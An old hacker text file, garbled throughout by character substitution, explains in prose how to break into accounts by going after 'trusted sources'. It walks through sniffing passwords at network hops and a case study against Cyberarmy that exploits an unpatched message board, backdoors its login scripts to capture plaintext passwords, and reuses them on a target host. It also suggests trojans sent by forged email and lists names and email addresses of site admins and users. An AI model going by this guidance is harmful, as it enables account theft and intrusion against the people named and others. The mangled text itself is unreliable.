Theyre not just trusted hosts, but trusted sources
Creator: m101 Have you ever thought to yourself, now how the hell did that comuter get hac!ed" #as that really ossible" This just doesnt ma!e sense, that comuter only had a single unvulnerable service, it cant have been hac!ed$$$ %art from the e&tensive use of 0day e&loits to hac! into seemingly invincible systems, it really doesnt seem ossible for many hac!s to have ta!en lace$ However, you are sadly mista!en, the system is only as secure as aranoia of its users$ 'veryone has heard of trusted hosts and how they can be used to brea! into comuter systems, but there is a larger scoe than this$ That is why i call them trusted sources$ (ne of the most famous hac!s on record )not necessarily the most imressive* was the one done by Mitnic! to hac! into Tsutomu +himomura,s ,secure, bo&$ This was done by Mitni! first disabling the client bo&, and then soofing his own connection to ma!e it aear that he was the client, from here he could easily do what he want as he was now a trusted source$ -ow, not everyone is vulnerable to this, and it can also be an e&termely dificult e&cercise these days to erfom, but the rincials and ideas behin it can be used in many situations$ Here is a situation that will truly show you how to hac! hotmail$ . can already hear all the !iddies yelling for joy$ %lthough gaining root access on the server is retty damn tric!y, the average !iddie wishes to gain access to a friend, enemy or girlfriends email account for reasons of all tyes of bullshit$ %nyway, lets set the situation u a little: Hac!er wants to brea! into targets email account, now target isnt stuid enough to give any eole their assword$ This would theoretically sto most eole straight away from gaining access$ /ets loo! at what haens when target attemts to login to hotmail with their all imortant assword$ Target wal!s to their comuter, and sits down to use it$ -e&t they connect to the internet and re0uest hotmails login age$ Then after receiving it, they send their assword to hotmail to authenticate themselves$ They are now logged in$ +o you as!, where is the vulnerability in the situation" /ets brea! the rocess down further and discover the trusted sources: Target--Computer--ISP--Hop1--Hop2..HopX--Hotmail Domain +o from here we have the following trusted sources between the target and hotmail: Their computer The ISP Hop number 1 ... Hop number X 1enerally ,2, would be roughly atleast 10$ That means there are atleast 11 trusted sources inbetween the target and hotmail$ The target has unwillingly just trusted their assword to a number of total strangers$ .f any single one of these targets was to be hit by the hac!er, then they would gain the targets assword through simle ac!et sniffing$ This case was just to give you an idea of how bad trust can be, but it robably still doesnt e&lain how to hac! the unhac!able$ /et us ta!e a real target and see how it may be flawed$ Cyberarmy is an e&cellent e&amle, but how would you gain access" #ell here is how the system was once setu to the ublic: www.cyberarmy.com ca-pr.info ca-oi.org ca-cia.org !!ine.org e"ploitreearch.net These at one oint were the main domains of Cyberarmy, but i can garauntee you that hac!ing a single target is not going to gain you access to the main domain, so how is it ossible to hac! the main age" Here is the major list directly off the main site: ## Structure# The Cyber$rmy - C%&# Comman'er in Chief can(ac) X%&# *iceCinC wa1+,,! X%&# *iceCinC -ang .en Penguin /ar 'imple" 0et. CinC Chawmp /ar nar)le Cyber$rmy 1ni2erity - .en SH3PH30D Cyber$rmy Pri2acy Commiion - .en Tacheon &pen Source Intitute - *iceCinC barneyboy Special &peration - .en !ifnab 0ea'y 0epone - *iceCinC -ang Cyber$rmy Public 0elation - /ar CHi Cyber$rmy Intelligence $gency - .en 4eto Cyber$rmy I0C - .en wewal)in Cyber$rmy 3"ploit 0eearch - .en .ol'fih Internal Comman' - /ar a"em Cyber$rmy Ser2ice $n' Support - .en .oliath Thats a total of 13 eole who run the sites as admins$ However, they do not all have access to the main domain, infact only scanjac! and one or two more have it$ %lso the assword system randomly generates new asswords for the accounts on a regular basis$ The first thing is to ic! a target host, then lay with it and see if we can somehow e&loit it$ The newest host in the list is actually ca4osi$org, the oen source insutute of cyberarmy$ The guy who runs it )barnseyboy* aint too bad a blo!e$ %fter a bit of research into the site, we find the following eole aear to have riveledged rights to the server: barneyboy barneyboy5mail.com Xenic "enicp5yahoo.e aton aton16675hotmail.com hn webmater5hnonline.com pertina" pertina"5completeecom.com fightgra2ity anon.ymou285e"cite.com efo efo5ca-oi.com w,lf w,lf5ca-oi.com liptop liptop5ca-oi.com a2ataru a2ataru5ca-oi.com +o now we have a coule more sources for the tree$ 5ou can easily do a search on google for sites that these individuals visit, and from there gain even more sources$ The target for e&amle may be www$shnonline$com, the owner being ofcourse ,shn,$ %fter a bit of e&loration of the website, we discover shn doesnt care to much about it and doesnt !now how to udate software that well$ #e find that his messageboard is vulnerable to a si& month old vulnerability, and shn is too la6y to fi& it$ +o ofcourse we brea! into the site and head straight for the assword files$ (n insection, the MD7 hashes it stores contains a damn long assword, so brute forcing is useless$ %t this oint many would give u, but you have to remember that shn would obviously beleive that his (#- site is a trusted host, so therefore it would be 0uite easy after already having access to ma!e the login scrits save lain te&t asswords to a seerate file$ %fter the necessary changes are made, a wee! later shn logs in to chec! his messageboard and 8%M9 we now have his lainte&t assword and he is none the wiser$ :rom this oint shn robably doesnt care to much, what the hell is anyone going to do with shnonline$com" %bsolutely nothing, however we now try his assword on ca4osi$com and find$$$$$ .T #(;<+9 Thats right, we have now bro!en the trust barrier of one individual to gain access to another host$ -ow, ca4osi just so haens to be another one of them h nu!e sites, and since shn is an admin, we can just clic! a few buttons and download the user database$ #hat goodies would you e&ect to find in the database" #ell here are some ossible e&amles: merryb mbee)man5re'hat.com 9e'eral /ar)eting /anager -im abr5pan'ora.be http#%%www.abrecurity.com ieetglue ieetglue5e"ploitreearch.net http#%%www.e"ploitreearch.net 'ai(o 'ai(o5irc-'e2.net http#%%www.ionh:.com gabbana gabbana5!!ine.org http#%%www.!!ine.org Para'o" 'fayra,,5umail.ucb.e'u *ooDoo *ooDoomater5ecureroot.com elybi elybi5getroot.net http#%%www.getroot.net oleg o.uru5cuohio.e'u ray!or" ray!or"5earthlin).net www.ray!or".com )These are just general addresses that were gathered from around the net* :rom this small list, there is a high ossiblity we could get ourselves a few web server, $edu accounts and various other interesting things$ The average database will contain all tyes of juicy information, and guess what, you would have just violated around 700 eoles trusted sources in one go$ %s you can see from this, you could now use the new information, and the trusted source itself to gain more and more access to the systems$ :rom there im sure you could find a way to gain access to one of the leaders ersonal comuter, and from there easily log their assword to access the main website$ .f you are wondering this was (-/5 a case study, not an actual hac!$ Heres another 0uic! case study of how totally stuid most eole are$ 'veryone !nows the roblems that e&ist in smt to allow eole to somewhat forge mail, but not many eole even consider how it could also become a owerful trusted source$ . garauntee that if you were to receive an email from your girlfriend or best mate that didnt loo! sus, you would haily oen it and not even realise youve just installed a trojan on your bo&$ Trusted sources come into everything, you dont have to thin! much to find them$ .t all really just turns into a mass ammount of social engineering$ % target is only really as secure as the ammount of effort the hac!er uts into brea!ing it$ The same alies to most situations in life, your house !ey doesnt rotect from someone running a car through the door does it" -o it doesnt, it only stos the casual burglar with not much intent$$$$